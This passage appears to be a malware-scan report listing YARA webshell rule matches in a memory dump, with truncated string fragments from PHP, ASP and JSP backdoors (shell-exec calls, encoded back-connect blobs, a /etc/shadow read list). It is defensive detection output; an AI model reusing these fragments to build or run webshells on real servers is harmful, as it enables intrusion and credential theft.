- 0x35045:$s2: <img src="http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png" align="center
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | shells_PHP_wso | Semi-Auto-generated - file wso.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3513b:$s0: $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbi
- 0x3518f:$s3: echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=pos
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | backdoor1_php | Semi-Auto-generated - file backdoor1.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3528e:$s1: echo "[DIR] <A HREF=\"".$_SERVER['PHP_SELF']."?rep=".realpath($rep."..
- 0x352d9:$s2: class backdoor {
- 0x352ee:$s4: echo "<a href=\"".$_SERVER['PHP_SELF']."?copy=1\">Copier un fichier</a> <
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | elmaliseker_asp | Semi-Auto-generated - file elmaliseker.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x353ee:$s0: if Int((1-0+1)*Rnd+0)=0 then makeEmail=makeText(8) & "@" & makeText(8) & "."
- 0x3543f:$s1: <form name=frmCMD method=post action="<%=gURL%>">
- 0x35475:$s2: dim zombie_array,special_array
- 0x35498:$s3: http://vnhacker.org
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | indexer_asp | Semi-Auto-generated - file indexer.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x24c9d:$s0: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input typ
- 0x3555a:$s0: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input typ
- 0x4c686:$s0: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input typ
- 0x355ab:$s2: D7nD7l.km4snk`JzKnd{n_ejq;bd{KbPur#kQ8AAA==^#~@%>></td><td><input type="submit
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | DxShell_php_php | Semi-Auto-generated - file DxShell.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x1f2e4:$s0: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x32e5d:$s0: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x356b0:$s0: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x356ff:$s2: print "\n".'<tr><td width=100pt class=linelisting><nobr>POST (php eval)</td><
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | s72_Shell_v1_1_Coding_html | Semi-Auto-generated - file s72 Shell v1.1 Coding.html.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x35819:$s0: Dizin</font></b></font><font face="Verdana" style="font-size: 8pt"><
- 0x35862:$s1: s72 Shell v1.0 Codinf by Cr@zy_King
- 0x3588a:$s3: echo "<p align=center>Dosya Zaten Bulunuyor</p>"
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hidshell_php_php | Semi-Auto-generated - file hidshell.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x35973:$s0: <?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U
- 0x40a64:$s0: <?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | kacak_asp | Semi-Auto-generated - file kacak.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x35a6e:$s0: Kacak FSO 1.0
- 0x35a80:$s1: if request.querystring("TGH") = "1" then
- 0x35aad:$s3: <font color="#858585">BuqX</font></a></font><font face="Verdana" style=
- 0x35af9:$s4: mailto:BuqX@hotmail.com
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | PHP_Backdoor_Connect_pl_php | Semi-Auto-generated - file PHP Backdoor Connect.pl.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x35bdf:$s0: LorD of IRAN HACKERS SABOTAGE
- 0x35c01:$s1: LorD-C0d3r-NT
- 0x34e7a:$s2: echo --==Userinfo==-- ;
- 0x35c13:$s2: echo --==Userinfo==-- ;
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Antichat_Socks5_Server_php_php | Semi-Auto-generated - file Antichat Socks5 Server.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x35cff:$s0: $port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);
- 0x35d54:$s3: # [+] Domain name address type
- 0x35d79:$s4: www.antichat.ru
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Antichat_Shell_v1_3_php | Semi-Auto-generated - file Antichat Shell v1.3.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x22897:$s0: Antichat
- 0x228ca:$s0: Antichat
- 0x229a4:$s0: Antichat
- 0x35c2b:$s0: Antichat
- 0x35c72:$s0: Antichat
- 0x35d89:$s0: Antichat
- 0x35dc9:$s0: Antichat
- 0x35e4f:$s0: Antichat
- 0x35e5c:$s1: Can't open file, permission denide
- 0x32f01:$s2: $ra44
- 0x32f24:$s2: $ra44
- 0x35e83:$s2: $ra44
- 0x36148:$s2: $ra44
- 0x3616b:$s2: $ra44
- 0x37385:$s2: $ra44
- 0x373a8:$s2: $ra44
- 0x454a3:$s2: $ra44
- 0x454c6:$s2: $ra44
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2_php | Semi-Auto-generated - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x1b993:$s0: Welcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy
- 0x35f79:$s0: Welcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy
- 0x1b9de:$s1: Mode Shell v1.0</font></span>
- 0x35fc2:$s1: Mode Shell v1.0</font></span>
- 0x35fe4:$s2: has been already loaded. PHP Emperor <xb5@hotmail.
- 0x3f9b5:$s2: has been already loaded. PHP Emperor <xb5@hotmail.
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | mysql_php_php | Semi-Auto-generated - file mysql.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x360c9:$s0: action=mysqlread&mass=loadmass">load all defaults
- 0x360ff:$s2: if (@passthru($cmd)) { echo " -->"; $this->output_state(1, "passthru
- 0x32f01:$s3: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 =
- 0x36148:$s3: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 =
- 0x37385:$s3: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 =
- 0x454a3:$s3: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 =
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Worse_Linux_Shell_php | Semi-Auto-generated - file Worse Linux Shell.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x36249:$s1: print "<tr><td><b>Server is:</b></td><td>".$_SERVER['SERVER_SIGNATURE']."</td
- 0x3629b:$s2: print "<tr><td><b>Execute command:</b></td><td><input size=100 name=\"_cmd
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | cyberlords_sql_php_php | Semi-Auto-generated - file cyberlords_sql.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x363aa:$s0: Coded by n0 [nZer0]
- 0x363c2:$s1: www.cyberlords.net
- 0x363da:$s2: U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAMUExURf///wAAAJmZzAAAACJoURkAAAAE
- 0x3642b:$s3: return "<BR>Dump error! Can't write to ".htmlspecialchars($file);
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | cmd_asp_5_1_asp | Semi-Auto-generated - file cmd-asp-5.1.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x36523:$s0: Call oS.Run("win.com cmd.exe /c del "& szTF,0,True)
- 0x1e6e1:$s3: Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF &
- 0x3655b:$s3: Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF &
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | pws_php_php | Semi-Auto-generated - file pws.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x36646:$s0: <div align="left"><font size="1">Input command :</font></div>
- 0x36688:$s1: <input type="text" name="cmd" size="30" class="input"><br>
- 0x366c7:$s4: <input type="text" name="dir" size="30" value="<? passthru("pwd"); ?>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | PHP_Shell_php_php | Semi-Auto-generated - file PHP Shell.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x20d54:$s0: echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input
- 0x367c7:$s0: echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input
- 0x22847:$s1: echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=
- 0x36813:$s1: echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Ayyildiz_Tim___AYT__Shell_v_2_1_Biz_html | Semi-Auto-generated - file Ayyildiz Tim -AYT- Shell v 2.1 Biz.html.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3685a:$s0: Ayyildiz
- 0x368ab:$s0: Ayyildiz
- 0x36942:$s0: Ayyildiz
- 0x43dda:$s0: Ayyildiz
- 0x43e2e:$s0: Ayyildiz
- 0x56e3b:$s0: Ayyildiz
- 0x3694f:$s1: TouCh By iJOo
- 0x43ef3:$s1: TouCh By iJOo
- 0x36961:$s2: First we check if there has been asked for a working directory
- 0x369a4:$s3: http://ayyildiz.org/images/whosonline2.gif
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | EFSO_2_asp | Semi-Auto-generated - file EFSO_2.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x36a7b:$s0: Ejder was HERE
- 0x36a8e:$s1: *~PU*&BP[_)f!8c2F*@#@&~,P~P,~P&q~8BPmS~9~~lB~X`V,_,F&*~,jcW~~[_c3TRFFzq@#@&PP,~~
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | lamashell_php | Semi-Auto-generated - file lamashell.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x36b91:$s0: lama's'hell
- 0x41e2f:$s0: lama's'hell
- 0x36ba1:$s1: if($_POST['king'] == "") {
- 0x36bc0:$s2: if (move_uploaded_file($_FILES['fila']['tmp_name'], $curdir."/".$_FILES['f
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Ajax_PHP_Command_Shell_php | Semi-Auto-generated - file Ajax_PHP Command Shell.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x36cd7:$s1: newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>
- 0x36d2c:$s2: Empty Command..type \"shellhelp\" for some ehh...help
- 0x36d66:$s3: newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enct
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | JspWebshell_1_2_jsp | Semi-Auto-generated - file JspWebshell 1.2.jsp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2a34a:$s0: JspWebshell
- 0x2a3a0:$s0: JspWebshell
- 0x36db7:$s0: JspWebshell
- 0x36df3:$s0: JspWebshell
- 0x36e75:$s0: JspWebshell
- 0x40e55:$s0: JspWebshell
- 0x40e95:$s0: JspWebshell
- 0x44343:$s0: JspWebshell
- 0x44385:$s0: JspWebshell
- 0x36e85:$s1: CreateAndDeleteFolder is error:
- 0x40f3b:$s1: CreateAndDeleteFolder is error:
- 0x4442b:$s1: CreateAndDeleteFolder is error:
- 0x36ea9:$s2: <td width="70%" height="22"> <%=env.queryHashtable("java.c
- 0x36eed:$s3: String _password ="111";
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Sincap_php_php | Semi-Auto-generated - file Sincap.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x36fba:$s0: $baglan=fopen("/tmp/$ekinci",'r');
- 0x36fe1:$s2: $tampon4=$tampon3-1
- 0x36ff9:$s3: @aventgrup.net
- 0x3eb34:$s3: @aventgrup.net
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Test_php_php | Semi-Auto-generated - file Test.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x370b8:$s0: $yazi = "test" . "\r\n";
- 0x4faf3:$s0: $yazi = "test" . "\r\n";
- 0x370d5:$s2: fwrite ($fp, "$yazi");
- 0x4fb10:$s2: fwrite ($fp, "$yazi");
- 0x370f0:$s3: $entry_line="HACKed by EntriKa";
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Phyton_Shell_py | Semi-Auto-generated - file Phyton Shell.py.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x371c7:$s1: sh_out=os.popen(SHELL+" "+cmd).readlines()
- 0x371f6:$s2: # d00r.py 0.3a (reverse|bind)-shell in python by fQ
- 0x37230:$s3: print "error; help: head -n 16 d00r.py"
- 0x3725c:$s4: print "PW:",PW,"PORT:",PORT,"HOST:",HOST
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | mysql_tool_php_php | Semi-Auto-generated - file mysql_tool.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x37341:$s0: $error_text = '<strong>Failed selecting database "'.$this->db['
- 0x32f01:$s1: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERV
- 0x37385:$s1: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERV
- 0x454a3:$s1: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERV
- 0x373ce:$s4: <div align="center">The backup process has now started<br
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Zehir_4_asp | Semi-Auto-generated - file Zehir 4.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x374b7:$s2: </a><a href='"&dosyapath&"?status=10&dPath="&f1.path&"&path="&path&"&Time=
- 0x37506:$s4: <input type=submit value="Test Et!" onclick="
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | sh_php_php | Semi-Auto-generated - file sh.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x375e0:$s1: $ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/e
- 0x37635:$s2: Show <input type=text size=5 value=".((isset($_POST['br_st']))?$_POST['br_st']:
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | phpbackdoor15_php | Semi-Auto-generated - file phpbackdoor15.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3773f:$s1: echo "fichier telecharge dans ".good_link("./".$_FILES["fic"]["na
- 0x37785:$s2: if(move_uploaded_file($_FILES["fic"]["tmp_name"],good_link("./".$_FI
- 0x377ce:$s3: echo "Cliquez sur un nom de fichier pour lancer son telechargement. Cliquez s
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | phpjackal_php | Semi-Auto-generated - file phpjackal.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x378ce:$s3: $dl=$_REQUEST['downloaD'];
- 0x378ed:$s4: else shelL("perl.exe $name $port");
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | sql_php_php | Semi-Auto-generated - file sql.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x379bf:$s1: fputs ($fp, "# RST MySQL tools\r\n# Home page: http://rst.void.ru\r\n#
- 0x32292:$s2: http://rst.void.ru
- 0x379ee:$s2: http://rst.void.ru
- 0x37a0a:$s2: http://rst.void.ru
- 0x1b3d8:$s3: print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&
- 0x37a21:$s3: print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | cgi_python_py | Semi-Auto-generated - file cgi-python.py.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x37b19:$s0: a CGI by Fuzzyman
- 0x37b2f:$s1: """+fontline +"Version : " + versionstring + """, Running on : """ +
- 0x37b79:$s2: values = map(lambda x: x.value, theform[field]) # allows for
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ru24_post_sh_php_php | Semi-Auto-generated - file ru24_post_sh.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x37c7a:$s1: <title>Ru24PostWebShell - ".$_POST['cmd']."</title>
- 0x37cb2:$s3: if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a
- 0x408e0:$s3: if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a
- 0x37d04:$s4: Writed by DreAmeRz
- 0x40947:$s4: Writed by DreAmeRz
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | DTool_Pro_php | Semi-Auto-generated - file DTool Pro.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x37dc9:$s0: r3v3ng4ns\nDigite
- 0x3e2fb:$s0: r3v3ng4ns\nDigite
- 0x37ddf:$s1: if(!@opendir($chdir)) $ch_msg="dtool: line 1: chdir: It seems that the permissi
- 0x37e33:$s3: if (empty($cmd) and $ch_msg=="") echo ("Comandos Exclusivos do DTool Pro\n
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | telnetd_pl | Semi-Auto-generated - file telnetd.pl.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x37f2a:$s0: 0ldW0lf
- 0x37f36:$s1: However you are lucky :P
- 0x37f53:$s2: I'm FuCKeD
- 0x37f62:$s3: ioctl($CLIENT{$client}->{shell}, &TIOCSWINSZ, $winsize);#
- 0x37fa0:$s4: atrix@irc.brasnet.org
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | php_include_w_shell_php | Semi-Auto-generated - file php-include-w-shell.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3807c:$s0: $dataout .= "<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incd
- 0x380d0:$s1: if($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $strOutput .= DB
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php | Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x38121:$s0: Safe0ver
- 0x3817a:$s0: Safe0ver
- 0x38219:$s0: Safe0ver
- 0x38226:$s1: Script Gecisi Tamamlayamadi!
- 0x38247:$s2: document.write(unescape('%3C%68%74%6D%6C%3E%3C%62%6F%64%79%3E%3C%53%43%52%49%50%
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | shell_php_php | Semi-Auto-generated - file shell.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3834a:$s1: /* We have found the parent dir. We must be carefull if the parent
- 0x38392:$s2: $tmpfile = tempnam('/tmp', 'phpshell');
- 0x383be:$s3: if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | telnet_cgi | Semi-Auto-generated - file telnet.cgi.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x416c0:$s0: www.rohitab.com
- 0x32a4d:$s1: W A R N I N G: Private Server
- 0x384ae:$s1: W A R N I N G: Private Server
- 0x384d0:$s2: print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
- 0x3850f:$s3: $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $C
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ironshell_php | Semi-Auto-generated - file ironshell.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x385fe:$s0: www.ironwarez.info
- 0x38615:$s1: $cookiename = "wieeeee";
- 0x38632:$s2: ~ Shell I
- 0x3e424:$s2: ~ Shell I
- 0x38640:$s3: www.rootshell-team.info
- 0x3865c:$s4: setcookie($cookiename, $_POST['pass'], time()+3600);
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | backdoorfr_php | Semi-Auto-generated - file backdoorfr.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x38745:$s1: www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tan
- 0x3879a:$s2: print("<br>Provenance du mail : <input type=\"text\" name=\"provenanc
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | aspydrv_asp | Semi-Auto-generated - file aspydrv.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x38894:$s0: If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))
- 0x12c9:$s1: password
- 0x2d23:$s1: password
- 0x355f:$s1: password
- 0x35cf:$s1: password
- 0xaa43:$s1: password
- 0xaa5b:$s1: password
- 0xef8d:$s1: password
- 0x11fab:$s1: password
- 0x12475:$s1: password
- 0x12657:$s1: password
- 0x12708:$s1: password
- 0x1a970:$s1: password
- 0x1ad07:$s1: password
- 0x1d0c0:$s1: password
- 0x1d0ee:$s1: password
- 0x20519:$s1: password
- 0x21223:$s1: password
- 0x28cf6:$s1: password
- 0x2a58f:$s1: password
- 0x2a5b8:$s1: password
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | cmdjsp_jsp | Semi-Auto-generated - file cmdjsp.jsp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x389b8:$s0: // note that linux = cmd and windows = "cmd.exe /c + cmd"
- 0x241dc:$s1: Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
- 0x389f7:$s1: Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
- 0x21bdc:$s2: cmdjsp.jsp
- 0x21c8c:$s2: cmdjsp.jsp
- 0x24145:$s2: cmdjsp.jsp
- 0x24235:$s2: cmdjsp.jsp
- 0x3893f:$s2: cmdjsp.jsp
- 0x38a37:$s2: cmdjsp.jsp
- 0x30b69:$s3: michaeldaw.org
- 0x31813:$s3: michaeldaw.org
- 0x33e7e:$s3: michaeldaw.org
- 0x38a46:$s3: michaeldaw.org
- 0x4186e:$s3: michaeldaw.org
- 0x41895:$s3: michaeldaw.org
- 0x41f95:$s3: michaeldaw.org
- 0x41fbc:$s3: michaeldaw.org
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | h4ntu_shell__powered_by_tsoi_ | Semi-Auto-generated - file h4ntu shell [powered by tsoi | unknown | - 0x1b0d3:$s0: h4ntu shell
- 0x38a9b:$s0: h4ntu shell
- 0x38b27:$s0: h4ntu shell
- 0x3f0b1:$s0: h4ntu shell
- 0x3f159:$s0: h4ntu shell
- 0x38b37:$s1: system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Ajan_asp | Semi-Auto-generated - file Ajan.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x23ca2:$s1: c:\downloaded.zip
- 0x25b51:$s1: c:\downloaded.zip
- 0x38c27:$s1: c:\downloaded.zip
- 0x38c3d:$s2: Set entrika = entrika.CreateTextFile("c:\net.vbs", True)
- 0x38c7a:$s3: http://www35.websamba.com/cybervurgun/
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | PHANTASMA_php | Semi-Auto-generated - file PHANTASMA.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x38d53:$s0: >[*] Safemode Mode Run</DIV>
- 0x38d74:$s1: $file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&see=$file>$file</a><br>
- 0x38dc5:$s2: [*] Spawning Shell
- 0x38ddc:$s3: Cha0s
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | MySQL_Web_Interface_Version_0_8_php | Semi-Auto-generated - file MySQL Web Interface Version 0.8.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x33f8d:$s0: SooMin Kim
- 0x38ec0:$s0: SooMin Kim
- 0x38ecf:$s1: http://popeye.snu.ac.kr/~smkim/mysql
- 0x38ef8:$s2: href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename
- 0x38f41:$s3: <th>Type</th><th> M </th><th> D </th><th>unsigned</th><th>zerofi
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | simple_cmd_html | Semi-Auto-generated - file simple_cmd.html.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x39048:$s1: <title>G-Security Webshell</title>
- 0x4575a:$s1: <title>G-Security Webshell</title>
- 0x3906f:$s2: <input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"
- 0x4571e:$s2: <input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"
- 0x390ab:$s3: <? if($cmd != "") print Shell_Exec($cmd);?>
- 0x45781:$s3: <? if($cmd != "") print Shell_Exec($cmd);?>
- 0x390db:$s4: <? $cmd = $_REQUEST["-cmd"];?>
- 0x457b1:$s4: <? $cmd = $_REQUEST["-cmd"];?>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0001 | Semi-Auto-generated - from files 1.txt, c2007.php.php.txt, c100.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3922d:$s0: echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." ("
- 0x39279:$s3: echo "<td> <a href=\"".$sql_surl."sql_act=query&sql_query=".ur
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0002 | Semi-Auto-generated - from files nst.php.php.txt, img.php.php.txt, nstview.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3940e:$s0: <tr><form method=post><td><font color=red><b>Back connect:</b></font></td><td><i
- 0x39463:$s1: $perl_proxy_scp = "IyEvdXNyL2Jpbi9wZXJsICANCiMhL3Vzci91c2MvcGVybC81LjAwNC9iaW4v
- 0x394b7:$s2: <tr><form method=post><td><font color=red><b>Backdoor:</b></font></td><td><input
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0003 | Semi-Auto-generated - from files network.php.php.txt, xinfo.php.php.txt, nfm.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3965d:$s0: .textbox { background: White; border: 1px #000000 solid; color: #000099; font-fa
- 0x396b2:$s2: <input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0004 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, SpecialShell_99.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3985b:$s2: echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ft
- 0x398a6:$s3: $fqb_log .= "\r\n------------------------------------------\r\nDone!\r
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0005 | Semi-Auto-generated - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x39a9d:$s2: 'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner o
- 0x39aef:$s4: if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0006 | Semi-Auto-generated - from files c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt, ctt_sh.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x39cdb:$s0: "AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze"
